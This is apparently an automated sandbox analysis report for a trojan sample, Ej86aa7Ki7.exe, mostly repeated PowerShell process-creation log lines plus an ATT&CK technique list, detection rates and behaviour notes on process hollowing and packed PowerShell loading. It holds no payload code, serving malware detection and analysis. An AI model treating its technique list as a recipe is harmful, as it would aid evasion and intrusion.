Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Users\user\Desktop\Ej86aa7Ki7.exe Code function: 0_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess 0_2_0040344A
  • Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS
  • Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services
  • Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
  • Execution: 21 Windows Management Instrumentation, 1 Shared Modules, 1 PowerShell, Cron, Launchd, Scheduled Task, Systemd Timers
  • Persistence: 1 DLL Side-Loading, Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items
  • Privilege Escalation: 1 Access Token Manipulation, 111 Process Injection, 1 DLL Side-Loading, Login Hook, Network Logon Script, RC Scripts, Startup Items
  • Defense Evasion: 11 Masquerading, 31 Virtualization/Sandbox Evasion, 1 Access Token Manipulation, 111 Process Injection, 1 Software Packing, 1 DLL Side-Loading, Compile After Delivery
  • Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
  • Discovery: 11 Security Software Discovery, 1 Process Discovery, 31 Virtualization/Sandbox Evasion, 1 Application Window Discovery, 1 Remote System Discovery, 2 File and Directory Discovery, 34 System Information Discovery
  • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
  • Collection: 1 Archive Collected Data, 1 Clipboard Data, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
  • Command and Control: 1 Encrypted Channel, Junk Data, Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port
  • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
  • Impact: 1 System Shutdown/Reboot, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery
Behavior Graph ID: 1587855, Sample: Ej86aa7Ki7.exe, Startdate: 10/01/2025, Architecture: WINDOWS, Score: 68

  • Sample signatures: Multi AV Scanner detection for submitted file; AI detected suspicious sample
  • Ej86aa7Ki7.exe started; dropped C:\Users\user\AppData\...\Taarnvognenes.Ufe (Unicode); signature: Suspicious powershell command line found
  • powershell.exe started by Ej86aa7Ki7.exe; signatures: Sample uses process hollowing technique; Found suspicious powershell code related to unpacking or dynamic code loading; Loading BitLocker PowerShell Module
  • powershell.exe started SIHClient.exe, conhost.exe, msiexec.exe and 35 other processes

Source | Detection | Scanner | Label
Ej86aa7Ki7.exe | 63% | Virustotal |
Ej86aa7Ki7.exe | 61% | ReversingLabs | Win32.Trojan.Leonem
No Antivirus matches

Source | Detection | Scanner | Label
